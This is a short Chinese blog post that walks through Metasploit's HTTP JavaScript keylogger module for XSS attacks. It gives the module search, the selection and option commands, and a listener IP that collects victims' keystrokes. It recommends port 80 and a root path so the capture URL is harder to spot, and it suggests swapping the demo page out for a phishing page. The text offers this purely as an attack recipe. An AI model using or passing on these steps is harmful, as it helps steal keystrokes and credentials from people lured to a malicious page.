Metasploit之玩转不一样的XSS

  • A+
所属分类:颓废's Blog

Metasploit之玩转不一样的XSS
参考文献:http://www.freebuf.com/articles/3549.html

这里主要是运用XSS攻击进行的键盘记录keylogger

首先我们打开metasploit,在msf中搜索下可用的keylogger模块

msf > search keylogger    -->搜索keylogger模块

得到回显三个模块

   auxiliary/server/capture/http_javascript_keylogger                   
normal  Capture: HTTP JavaScript Keylogger//正常捕获:HTTP的JavaScript程序

   post/osx/capture/keylog_recorder                                     
normal  OSX Capture Userspace Keylogger//正常的OSX捕捉用户的键盘记录程序

   post/windows/capture/lockout_keylogger                               
normal  Windows Capture Winlogon Lockout Credential Keylogger//正常的Windows凭据捕获winlogon锁定键盘记录

这里我们可以测试的是利用HTTP的JavaScript程序捕获键盘记录,XSS运用的

use auxiliary/server/capture/http_javascript_keylogger    -->使用该模块

show options                                              -->查看设置选项

set srvhost 192.168.2.146                                 -->设置我们的反弹回来的IP地址

run                                                       -->运行,得到XSS利用地址

运行后发现我们得到的地址是这样的:http://192.168.2.146:8080/qD5XRm?id=35632ed2

若为了方便隐藏,我们可以设置端口SRVPORT为80,路径URIPATH为根目录下“/”,命令如下

set srvport 80    -->设置访问端口80

set uripath /     -->设置访问路径为根目录

run               -->运行,得到地址,等待访问捕获键盘记录

得到回显地址:http://192.168.2.146:80/

PS:在设置选项中还有一个配置“demo”,就是msf本身自带的测试页面,我们在做钓鱼攻击的时候需要将这个页面替换掉就可以了

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: